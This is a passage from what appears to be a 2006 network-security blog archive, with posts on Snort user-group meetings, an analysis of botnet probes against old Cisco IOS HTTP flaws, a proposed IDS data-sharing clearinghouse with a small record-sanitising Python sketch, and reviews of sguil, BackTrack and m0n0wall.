It seems to me as though I've detected a bit of a pattern, though: the more comfortable a person is with technical matters, the less likely they are to respect the CISSP. Is it just our geeky tendency to look down on anything that can be done by any suit-and-tie lackey? Is the perception that CISSP == management == PHB? I don't think it's really that simple, but maybe we geeks just need someone to love to hate, and Bill Gates wasn't available today.

If anyone has any theories they'd like to share, or if you hate people who hold CISSPs and would be kind enough to let me know why, please leave a comment.

Sunday, February 26, 2006

March HRSUG meeting

Hi, all. I just want to remind everyone that the March meeting of the Hampton Roads Snort Users Group (HRSUG) is coming up:


Date: Wednesday, 8 March 2006
Time: 7:00PM
Place: Williamsburg Regional Library
515 Scotland Street
Williamsburg, VA
(757) 259-4040


As of this moment, there is no topic assigned to the meeting. I'll work on that, but if anyone has a suggestion or would like to volunteer to talk about something, please let me know.

Friday, February 24, 2006

Weird Cisco attacks happening all over the world

On February 4th, I started seeing small numbers of the following Snort alert:

Cisco IOS HTTP configuration attempt

Here's a breakdown of the number of alerts per day for the first couple of weeks of the month:


| Date       | Alerts |
| 2006-02-04 | 6      |
| 2006-02-05 | 4      |
| 2006-02-13 | 2      |
| 2006-02-14 | 1      |
| 2006-02-15 | 30     |
| 2006-02-16 | 26     |

There were two things that drew my attention to this activity. First, it's an old exploit (detailed in this advisory). Second, there was a sharp spike in activity starting on the 15th.

Around the same time I noticed this, the SANS ISC Handler's Diary posted an entry about it, and they didn't know what was going on either. I contacted them about it, but have heard nothing in reply.

I didn't think too much about this at first, but after collecting a few more days' worth of data, I noticed the following: each source IP only attacked one destination IP, and while there is usually a steady stream of 3 or 4 alerts per hour, there are some periods where I go several hours without seeing anything. These things tend to suggest that the attacks are coordinated, probably through a single botnet.

Today, I heard from several other analysts around the planet who have seen similar traffic. I got the IPs and timestamps from a few of them and am in the process of analyzing some of the data. What I can see so far is that we've got around 280 individual attacks from ~250 unique IPs. Each of the three sites reporting has at least a few IPs in common with the others, further supporting my idea that this is all due to one big botnet.

I don't have much information yet, but big thanks to fellow #snort-gui regulars David Lowless and hewhodoesnotwishtobenamedbutknowswhoheiseventhoughIrefusetousehiscodenameJesus for providing data and sharing thoughts & ideas about this. It may all just turn out to be nothing, but the coordination and stealth involved make it interesting if nothing else.

Update 2006-02-24 15:53: I asked around on the #shadowserver channel, and have found that attacks like the ones I observed have been found in at least one active botnet (not sure if the scattered sightings are from different botnets or not).

Why they are probing for 5 year old vulnerabilities in Cisco routers is still a mystery. Maybe they just want to use them as proxies for IRC/spam/other attacks. I hope that's the extent of their ambitions.

Update 2006-03-06 11:41: Based on conversations I've had with others who are experiencing these sorts of attacks, I've concluded that the most likely scenario is that the perpetrator is hoping to gain access to Cisco devices in order to use them as IRC proxies to hide their true network address while trading credit card numbers and other illicit info. In other words, they can log on to the devices and initiate outbound network connections to IRC servers. One analyst speculated that there may be an IRC client plugin of some sort to facilitate this, and that seems like a reasonable assumption.

BTW, if this technique is used to disguise IRC, it may also be used to disguise connections to other services as well (HTTP?). This all seems like a pretty roundabout way to achieve the hypothesized goal, but certainly in keeping with technology that existed at the time the original exploit was discovered. Maybe someone is just using some old scripts they found online somewhere?

Update 2006-03-07 06:53: The Philippine Honeynet Project (which I reached via this SANS ISC diary entry) has also noticed these probes. Their analysis includes the name of the tool they believe is responsible (ciscoscanner). Unaccountably, though, they suggest the tool is looking for the vulnerability listed in this advisory, which doesn't seem to fit the observed data. It's good to see that some other people have finally noticed this, at least. These probes kind of stick out like a sore thumb if you're paying attention.

Tuesday, February 14, 2006

Dshield for IDS systems?

Most of us are probably familiar with the Dshield project, which collects firewall logs from users around the planet. They process this data to extract attack trends and produce reports we can use to help evaluate the potential "hostileness" (my term) of a given IP address.

While going through my morning sguil operations, I thought to myself, "Why haven't we done this for IDS events yet?"

My idea is very simple. Sguil requires an analyst to assign each event to a category (e.g., "successful admin compromise", "attempted compromise", "virus activity", "no action required", etc.). For those categories which correspond to confirmed malicious intent, why not collect data about the alerts and forward it to a central clearinghouse?

Of course, you wouldn't want to collect all the data, for privacy reasons. You'd probably only want the attacker's IP, the timestamp and a common reference number to show what event occurred (the Snort SID, for example, though that only applies to a single IDS). You could also apply some basic rules to the data before submission, for example to delete all records originating from your own network.
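Just to make the idea concrete, here's a rough Python sketch of the kind of sanitized record I'm picturing a sensor submitting. The field names and category strings are invented here purely for illustration; no such clearinghouse or submission format actually exists.

# Hypothetical submission record for the "Dshield for IDS" idea.
# Field names and category strings are made up for illustration only.
import ipaddress
import json

# Categories an analyst has confirmed as malicious.
REPORTABLE_CATEGORIES = {"successful admin compromise", "attempted compromise", "virus activity"}

MY_NETWORKS = [ipaddress.ip_network("192.0.2.0/24")]   # never report our own hosts

def to_report(event):
    """Strip a confirmed event down to attacker IP, timestamp and signature ID."""
    if event["category"] not in REPORTABLE_CATEGORIES:
        return None
    src = ipaddress.ip_address(event["src_ip"])
    if any(src in net for net in MY_NETWORKS):
        return None
    return {"attacker_ip": str(src),
            "timestamp": event["timestamp"],
            "snort_sid": event["sid"]}

if __name__ == "__main__":
    event = {"src_ip": "203.0.113.7", "timestamp": "2006-02-14 09:12:33",
             "sid": 2404, "category": "attempted compromise",
             "payload": "...private stuff we deliberately drop..."}
    print(json.dumps(to_report(event)))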

So what would be some of the benefits of this system? First, the clearinghouse would be in a position to notice hosts which were attacking large segments of the Internet. This determination would be based on confirmed data submitted by human analysts and would therefore be more inherently trustworthy than data garnered from firewall logs. Second, the clearinghouse could directly observe and report on the types of attacks being seen in the wild, something the existing Dshield project cannot do. Finally, this data could be fed back down into the IDS analysis tools to help adjust the severity of observed events based on how similar events were previously categorized by other analysts. Sort of a Cloudmark for IDS.

I'm not suggesting that there's anything wrong with Dshield. They're providing a great service that I rely upon to help me make decisions every day. It's just that they're only capturing one type of data (firewall logs). I think their model could logically be extended to IDS operations, to the benefit of the entire community.

Update 02/14/2006 11:36: Someone on the #dshield IRC channel mentioned that this idea also sounds similar to Shadowserver. True enough, though they're using their own net of mwcollect and Nepenthes collectors to track malware distribution, and so they're not capturing IDS data. Great for tracking automated attacks and generating high-quality blacklists of sites actually distributing malware. Not quite what I had in mind, but also a very valuable dshield-esque service. Check them out, but keep in mind that they haven't gone public with their data yet. If you ask nicely, though, they might give you access to the IRC channel that keeps track of the botnet reports in realtime. I'm going to check it out.

Sguil 0.6.1 released

There's a new Sguil release to start your morning. 0.6.1 includes an updated client that's more responsive with large data sets. It also has some major new features, like:


  • The use of UNION in the MySQL queries is now the default. This has led to at least an order of magnitude decrease in the search time in my own (huge) SANCP database.
  • There's a new panel that displays snort statistics for each sensor. This finally allows you a semi-realtime view of packet loss and traffic/session statistics for each sensor.
  • Communication between the sensors and the server can now be encrypted with OpenSSL/TLS, using the same mechanism that protects the traffic between the client and server.
  • Numerous important bug fixes

I've been using the prerelease version of this code for a little while now, and it works a heck of a lot better than 0.6.0p1 did.

One thing that I did notice is that it's not quite a drop-in replacement for the old version. If you are using TclTLS to encrypt client/server communications, you will need to add the "-o" command line flag to your startup script to turn this feature on. In previous versions, specifying the TLS library location with "-O" was enough, but now two subsystems can use the same library (the client and the sensor communication paths) so you have to explicitly tell sguild which one(s) you want to encrypt.

This small caveat aside, if you're using sguil, you probably should upgrade at your earliest convenience.

Wednesday, February 08, 2006

Packet fragmentation issues in the Snort IDS

One of the features that will eventually make it into Snort is a new processor for handling fragmented IP packets (the "frag3 preprocessor"). Sourcefire's Judy Novak has written a paper outlining the challenges to doing proper fragmentation reassembly, entitled Target-Based Fragmentation Reassembly.

It just so happens that Judy is speaking on this topic tonight at our HRSUG meeting, so if you're looking for more information about frag3 issues, now you have the link.

Update 2006-02-14 08:53: As Joel Esler pointed out, I got this whole topic badly wrong. I'm not really sure why, since I'm pretty familiar with frag3 and have been using it for some time. Maybe I was just rushed. Yeah, that's it.

Anyway, the actual topic was the new stream5 TCP stream reassembly preprocessor and its application of target-based stream reassembly policies. It was, by the way, an awesome presentation! Thanks, Judy, and come back to see us any time!

Tuesday, February 07, 2006

DDoS bot owner's story

A web server managed by fellow #snort-gui regular Chas Tomlin was recently attacked and turned into a DDoS zombie. Chas wrote up his experience, showing how he used a combination of network (sguil) and host forensics to track down the source of the problem. A good read, and he includes code, too. My favorite part is the IRC log where he secretly captured two of the bot operators chatting about how they got in.

Monday, February 06, 2006

Disabling IPv6 under Linux

I set up a sguil sensor at home this weekend, and decided to have it monitor outside my firewall, just because I wanted to know what things looked like out there. The sensor is a Linux box, and I followed the standard host-hardening prescription of turning off unnecessary services and interfaces. Since I'm not using IPv6, I wanted to turn support for it off entirely.

Being too lazy to compile my own kernel (goodbye, easy updates), I wanted to find a good way to disable IPv6 globally. It turns out that the easiest thing to do is to add the following line to your /etc/modules.conf file, then reboot.


alias net-pf-10 off

This prevents the kernel from loading the module that supports IPv6 (called "ipv6"). This is a CentOS 4.2 box, and I could find no easier way of accomplishing the same thing.

February HRSUG Meeting Reminder

Just a reminder that the February meeting of the Hampton Roads Snort Users' Group is this week:


Date: 8 Feb 2006
Time: 7:00PM
Place: Williamsburg Regional Library
515 Scotland Street
Williamsburg, VA
(757) 259-4040

Our guest speaker is Sourcefire's Judy Novak, who will be speaking about target-based fragment reassembly in Snort. Judy's bio and presentation abstract can be found in the original meeting announcement.

Sunday, February 05, 2006

BackTrack Security LiveCD Beta

I don't watch football (Superbowl? What's that?) so while the entire US is shut down to watch an East Coast/West Coast smackdown, of course I'm playing with the new BackTrack LiveCD.

In case you're not familiar with this project, this is the first beta release of the projects formerly known as Auditor and WHAX, merged into a single distribution that looks, at first glance, like a really strong offering.

I never used WHAX, but I have followed Auditor for about a year. It was a really nice collection of pre-installed security tools, mostly hacking and cracking packages like network scanners, vulnerability assessment tools, bluetooth utils, password crackers and the like. Not only did the OS offer reliable hardware autodetection, but the Auditor team went to a lot of trouble to add run-time autoconfiguration to many of the included tools (think: no more editing kismet.conf).

This version of BackTrack will look very familiar to Auditor users. It preserves much of Auditor's look-and-feel, including the task-oriented launch menu that made it so easy to find the right tool for the situation. There are still an awful lot of tools available, though I haven't compared the lists to see which were added or dropped in the conversion to BackTrack.

While the old Auditor releases were monolithic CD images, BackTrack is based on the SLAX Slackware LiveCD and now offers easy GUI-based ISO customization. This was originally a feature of WHAX/SLAX. This customization feature makes it easy to create a specialized BackTrack ISO for whatever you have in mind.

For example, even though the beta was just released today, I found that there were already three patches available. You read that right: patches for a LiveCD ISO. I downloaded the three module files from the BackTrack website as well as the Windows-based SLAX customization tool, MySLAX Creator. Within about 1 minute, I had remastered the ISO to include the new patches. Sure enough, at boot time it recognized the additional modules and loaded them into the running image.

Although the software on the beta release is not itself modularized, this is planned for the future, giving users the ability to strip out things they won't need. Users can already create additional modules to add to their ISO images, and I may try this with the Sguil and InstantNSM software.

Tomorrow, I hope to find time to play with some of the included tools some more, especially the bluetooth utilities. In the meantime, if you're at all interested in a security tools LiveCD, you really should give BackTrack a try.

Thursday, February 02, 2006

My experience with m0n0wall

My home LAN's firewall router died last night. I had an old Linksys with which I was fairly satisfied. It was cheap, quiet, didn't use much power and, of course, kept people off my network. When it died, I was kind of annoyed (I'd only had it about 18 months), but I'd seen this coming for a few days. Firewall crashes, DHCP problems and an unexplained inability to reach the management port while Internet access still worked had become the normal state of affairs. This is all to say that I'd already been shopping for a replacement.

Since I'm a hands-on kinda guy, I have been looking around at some of the specialized firewall OS distributions, all Open Source. The leader here seems to be m0n0wall, which is a stripped down OpenBSD. When my firewall finally died, I had already downloaded the distribution CD image (about 5MB), but hadn't tried it out yet. So of course, I figured "no time like the present."

I was very pleasantly surprised to find that the whole installation and configuration experience took me only about 20 minutes. About half that time was spent pulling a network card from an older system, adding it to the firewall box, and burning the ISO image to a CD-R.

I started by booting the CDROM and configuring the NICs. Not being a BSD user, I would never have guessed that my interfaces were named things like dc0 or xl0, but fortunately m0n0wall has a nifty autodetection routine that will detect which cards you have available and which is plugged into the LAN or the WAN side of your network. I didn't have to know anything about BSD NICs, so that was nice.

After that, everything was done via the web interface. I plugged in my powerbook (yay for the magic no-crossover-cable-required Ethernet port!) and started configuring. If you're used to consumer-grade products like my old Linksys, you'll be glad to hear that m0n0wall supports HTTPS for the management connection, although not by default. In what is probably the only gotcha in the whole process, m0n0wall will not generate a unique SSL certificate for you, so out of the box you're sharing the same cert used by every other m0n0wall owner. If you haven't changed the certificate, you have no security. There is a GUI to upload your own certificate, but m0n0wall won't create one for you; you have to generate it yourself.

Shortly thereafter, I had the whole thing up and running. NTP, DHCP server & client, Dynamic DNS and traffic shaping. I even had the chance to try out some of the snazzy statistics features, like the interface usage graphs, which are very impressive. Take that, Linksys!

Overall, I'm very impressed with the software. The hardware is a stock PC, though, which eats power and generates noise. The m0n0wall software also supports the Soekris 45xx and 48xx series systems, which seems like a good platform for this application. I'll probably try this eventually, but in the meantime I'm loving the creamy m0n0wall goodness.

Update 2006-02-02 09:21 Sorry, m0n0wall is a stripped down version of FreeBSD, not OpenBSD as I mentioned above.